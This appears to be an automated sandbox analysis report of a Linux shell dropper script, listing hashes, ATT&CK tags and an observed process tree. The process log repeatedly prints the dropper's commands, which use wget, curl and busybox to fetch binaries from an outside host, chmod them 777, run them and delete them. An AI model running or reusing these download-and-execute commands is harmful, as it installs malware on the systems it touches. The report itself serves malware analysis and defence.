702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b

General

Target

702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
Size

10KB
MD5

b5f00b34167fe96b81dc9665e6270fa1
SHA1

85c7e0bcb2347c19116b2c25edec820fb146b6d0
SHA256

702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b
SHA512

7b946d54011a2a0dab5d02d954062d55468a624a8efa18baba4d31e0c99bfba3592a845cf51555e4ffa0078bcb1aa5f3aa7bacd25f492cfdc17793d6c6c0bdbf
SSDEEP

192:SBfFdewQdKWQGeqVwYjPmOhkwkpzmOhkwEfAwQdKW6aeqVwYU:SBfFdewQdKWzPmOhkwkpzmOhkwEfAwQO

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
915	chmod
967	chmod
892	chmod
900	chmod
922	chmod
1026	chmod
857	chmod
975	chmod
754	chmod
1011	chmod
990	chmod
829	chmod
879	chmod
930	chmod
937	chmod
945	chmod
952	chmod
959	chmod
745	chmod
821	chmod
907	chmod
997	chmod
839	chmod
792	chmod
982	chmod
1004	chmod
1018	chmod
767	chmod

Executes dropped EXE 28 IoCs

Processes:

xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBcZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33iYVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2Xx5IRyDO0ja8W3a47xLggyNGLRlejUrtGpKqRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m200cUyejdGjWDM9heC9D1Qq26iolWznBRbPsw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ28DAAydpSAIycpCBrauDN21eaP6XA4GmyGXalLzH81U3bjmtzkXTaResmVfAqdRlVeUGAiqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqzO3syGODeuVuUmfRARoqx7fQxHIsd3vigLpOk67j4X78Se3rofRDSLuxjkRN8MfEnCNOzhDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G13fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFdO3syGODeuVuUmfRARoqx7fQxHIsd3vigLpOk67j4X78Se3rofRDSLuxjkRN8MfEnCNOzhDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G13fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFdxq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBcZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33iYVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2Xx5IRyDO0ja8W3a47xLggyNGLRlejUrtGpKqRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m200cUyejdGjWDM9heC9D1Qq26iolWznBRbPsw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ28DAAydpSAIycpCBrauDN21eaP6XA4GmyGXalLzH81U3bjmtzkXTaResmVfAqdRlVeUGAiqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

curlwgetbusyboxcurlcurlbusyboxwgetwgetcurlcurlwgetcurlbusyboxwgetbusyboxbusyboxwgetbusyboxbusyboxbusyboxwgetwgetcurlwgetwgetcurlwgetwgetbusyboxwgetcurlcurlbusyboxcurlwgetwgetbusyboxcurlcurlcurlbusyboxbusyboxwgetwgetbusyboxwgetcurlwgetwgetwgetbusyboxbusyboxbusyboxwgetbusyboxwgetcurlbusyboxwgetwgetwgetcurlbusyboxbusybox

pid	process
912	curl
918	wget
742	busybox
751	curl
758	curl
763	busybox
825	wget
896	wget
1015	curl
1023	curl
933	wget
949	curl
951	busybox
1000	wget
1003	busybox
1010	busybox
773	wget
828	busybox
838	busybox
921	busybox
978	wget
863	wget
956	curl
993	wget
1014	wget
866	curl
843	wget
963	wget
753	busybox
797	wget
826	curl
833	curl
966	busybox
979	curl
749	wget
757	wget
815	busybox
927	curl
934	curl
972	curl
852	busybox
899	busybox
1007	wget
986	wget
1017	busybox
723	wget
804	curl
948	wget
955	wget
971	wget
974	busybox
944	busybox
788	busybox
832	wget
875	busybox
885	wget
889	curl
906	busybox
903	wget
911	wget
926	wget
987	curl
1025	busybox
996	busybox

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc	curl
File opened for modification	/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1	curl
File opened for modification	/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m	curl
File opened for modification	/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m	curl
File opened for modification	/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX	curl
File opened for modification	/tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz	curl
File opened for modification	/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd	curl
File opened for modification	/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz	curl
File opened for modification	/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK	curl
File opened for modification	/tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz	curl
File opened for modification	/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK	curl
File opened for modification	/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb	curl
File opened for modification	/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2	curl
File opened for modification	/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd	curl
File opened for modification	/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i	curl
File opened for modification	/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb	curl
File opened for modification	/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2	curl
File opened for modification	/tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA	curl
File opened for modification	/tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA	curl
File opened for modification	/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp	curl
File opened for modification	/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz	curl
File opened for modification	/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp	curl
File opened for modification	/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1	curl
File opened for modification	/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc	curl
File opened for modification	/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X	curl
File opened for modification	/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX	curl
File opened for modification	/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i	curl
File opened for modification	/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X	curl

/tmp/702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
/tmp/702381acc309aa91d73d0237d2690231cf4fca9bc9c19bbe322c0f2ddf89575b.sh
1⤵
PID:713

/bin/rm
/bin/rm bins.sh
2⤵
PID:717

/usr/bin/wget
wget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- System Network Configuration Discovery
PID:723

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- System Network Configuration Discovery
PID:742

/bin/chmod
chmod 777 xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- File and Directory Permissions Modification
PID:745

/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
./xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- Executes dropped EXE
PID:746

/bin/rm
rm xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
PID:748

/usr/bin/wget
wget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- System Network Configuration Discovery
PID:749

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:751

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- System Network Configuration Discovery
PID:753

/bin/chmod
chmod 777 ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- File and Directory Permissions Modification
PID:754

/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
./ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- Executes dropped EXE
PID:755

/bin/rm
rm ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
PID:756

/usr/bin/wget
wget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- System Network Configuration Discovery
PID:757

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:758

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- System Network Configuration Discovery
PID:763

/bin/chmod
chmod 777 YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- File and Directory Permissions Modification
PID:767

/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
./YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- Executes dropped EXE
PID:768

/bin/rm
rm YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
PID:771

/usr/bin/wget
wget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- System Network Configuration Discovery
PID:773

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:779

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- System Network Configuration Discovery
PID:788

/bin/chmod
chmod 777 x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- File and Directory Permissions Modification
PID:792

/tmp/x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
./x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
- Executes dropped EXE
PID:793

/bin/rm
rm x5IRyDO0ja8W3a47xLggyNGLRlejUrtGpK
2⤵
PID:796

/usr/bin/wget
wget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- System Network Configuration Discovery
PID:797

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:804

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- System Network Configuration Discovery
PID:815

/bin/chmod
chmod 777 qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- File and Directory Permissions Modification
PID:821

/tmp/qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
./qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
- Executes dropped EXE
PID:822

/bin/rm
rm qRc9XF3fBYEwWbDytsOU5wkJ4Utsa7dg5m
2⤵
PID:824

/usr/bin/wget
wget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- System Network Configuration Discovery
PID:825

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:826

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- System Network Configuration Discovery
PID:828

/bin/chmod
chmod 777 200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- File and Directory Permissions Modification
PID:829

/tmp/200cUyejdGjWDM9heC9D1Qq26iolWznBRb
./200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
- Executes dropped EXE
PID:830

/bin/rm
rm 200cUyejdGjWDM9heC9D1Qq26iolWznBRb
2⤵
PID:831

/usr/bin/wget
wget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- System Network Configuration Discovery
PID:832

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:833

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- System Network Configuration Discovery
PID:838

/bin/chmod
chmod 777 Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- File and Directory Permissions Modification
PID:839

/tmp/Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
./Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
- Executes dropped EXE
PID:840

/bin/rm
rm Psw6XGDjuNR4AQZjq6viT55ATQgDQXCPJ2
2⤵
PID:842

/usr/bin/wget
wget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
- System Network Configuration Discovery
PID:843

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:844

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
- System Network Configuration Discovery
PID:852

/bin/chmod
chmod 777 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
- File and Directory Permissions Modification
PID:857

/tmp/8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
./8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
- Executes dropped EXE
PID:859

/bin/rm
rm 8DAAydpSAIycpCBrauDN21eaP6XA4GmyGX
2⤵
PID:862

/usr/bin/wget
wget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
- System Network Configuration Discovery
PID:863

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:866

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
- System Network Configuration Discovery
PID:875

/bin/chmod
chmod 777 alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
- File and Directory Permissions Modification
PID:879

/tmp/alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
./alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
- Executes dropped EXE
PID:880

/bin/rm
rm alLzH81U3bjmtzkXTaResmVfAqdRlVeUGA
2⤵
PID:883

/usr/bin/wget
wget http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
- System Network Configuration Discovery
PID:885

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
PID:891

/bin/chmod
chmod 777 iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
- File and Directory Permissions Modification
PID:892

/tmp/iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
./iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
- Executes dropped EXE
PID:893

/bin/rm
rm iqyoDtzmSCVfCzaxremnY51Ru6Y01sqcqz
2⤵
PID:895

/usr/bin/wget
wget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- System Network Configuration Discovery
PID:896

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- System Network Configuration Discovery
PID:899

/bin/chmod
chmod 777 O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- File and Directory Permissions Modification
PID:900

/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
./O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- Executes dropped EXE
PID:901

/bin/rm
rm O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
PID:902

/usr/bin/wget
wget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
- System Network Configuration Discovery
PID:903

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
- System Network Configuration Discovery
PID:906

/bin/chmod
chmod 777 Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
- File and Directory Permissions Modification
PID:907

/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
./Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
- Executes dropped EXE
PID:908

/bin/rm
rm Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
PID:910

/usr/bin/wget
wget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
- System Network Configuration Discovery
PID:911

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
PID:914

/bin/chmod
chmod 777 hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
- File and Directory Permissions Modification
PID:915

/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
./hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
- Executes dropped EXE
PID:916

/bin/rm
rm hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
PID:917

/usr/bin/wget
wget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- System Network Configuration Discovery
PID:918

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- System Network Configuration Discovery
PID:921

/bin/chmod
chmod 777 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- File and Directory Permissions Modification
PID:922

/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
./3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- Executes dropped EXE
PID:923

/bin/rm
rm 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
PID:925

/usr/bin/wget
wget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- System Network Configuration Discovery
PID:926

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:927

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
PID:929

/bin/chmod
chmod 777 O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- File and Directory Permissions Modification
PID:930

/tmp/O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
./O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
- Executes dropped EXE
PID:931

/bin/rm
rm O3syGODeuVuUmfRARoqx7fQxHIsd3vigLp
2⤵
PID:932

/usr/bin/wget
wget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
- System Network Configuration Discovery
PID:933

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:934

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
PID:936

/bin/chmod
chmod 777 Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
- File and Directory Permissions Modification
PID:937

/tmp/Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
./Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
- Executes dropped EXE
PID:938

/bin/rm
rm Ok67j4X78Se3rofRDSLuxjkRN8MfEnCNOz
2⤵
PID:940

/usr/bin/wget
wget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
PID:941

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
- System Network Configuration Discovery
PID:944

/bin/chmod
chmod 777 hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
- File and Directory Permissions Modification
PID:945

/tmp/hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
./hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
- Executes dropped EXE
PID:946

/bin/rm
rm hDtNkOQD7zYQ0NzujZvYIZoPVqx3z737G1
2⤵
PID:947

/usr/bin/wget
wget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- System Network Configuration Discovery
PID:948

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:949

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- System Network Configuration Discovery
PID:951

/bin/chmod
chmod 777 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- File and Directory Permissions Modification
PID:952

/tmp/3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
./3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
- Executes dropped EXE
PID:953

/bin/rm
rm 3fTOWrti2FtfIteTPQjVWLyGjTWh0xYLFd
2⤵
PID:954

/usr/bin/wget
wget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- System Network Configuration Discovery
PID:955

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:956

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
PID:958

/bin/chmod
chmod 777 xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- File and Directory Permissions Modification
PID:959

/tmp/xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
./xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
- Executes dropped EXE
PID:960

/bin/rm
rm xq3pfowTRCtzRiF9v2xZO1xo0yFEphVgBc
2⤵
PID:962

/usr/bin/wget
wget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- System Network Configuration Discovery
PID:963

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- System Network Configuration Discovery
PID:966

/bin/chmod
chmod 777 ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- File and Directory Permissions Modification
PID:967

/tmp/ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
./ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
- Executes dropped EXE
PID:968

/bin/rm
rm ZcYbsw1pHQvEmJ1yLx4lrIt88ouIsSb33i
2⤵
PID:970

/usr/bin/wget
wget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- System Network Configuration Discovery
PID:971

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:972

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- System Network Configuration Discovery
PID:974

/bin/chmod
chmod 777 YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
2⤵
- File and Directory Permissions Modification
PID:975

/tmp/YVnlIWOvp7NZ3sq9pURpZQrJX8Bh75xr2X
